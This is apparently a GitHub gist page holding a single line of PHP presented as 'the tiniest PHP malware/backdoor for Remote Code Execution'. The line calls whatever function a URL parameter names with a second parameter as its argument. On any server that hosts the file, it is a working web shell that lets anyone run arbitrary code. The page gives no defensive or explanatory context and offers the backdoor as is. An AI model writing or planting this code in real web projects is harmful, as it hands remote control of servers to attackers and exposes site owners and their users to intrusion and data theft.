Skip to content

Instantly share code, notes, and snippets.

@AnikHasibul
Created October 22, 2018 11:21
Show Gist options
  • Save AnikHasibul/20fa6b22dde3ea263ef9184faa7cfcd9 to your computer and use it in GitHub Desktop.
Save AnikHasibul/20fa6b22dde3ea263ef9184faa7cfcd9 to your computer and use it in GitHub Desktop.
The tiniest PHP malware/backdoor for Remote Code Execution.
<?php $_GET["f"]($_GET["p"]); ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment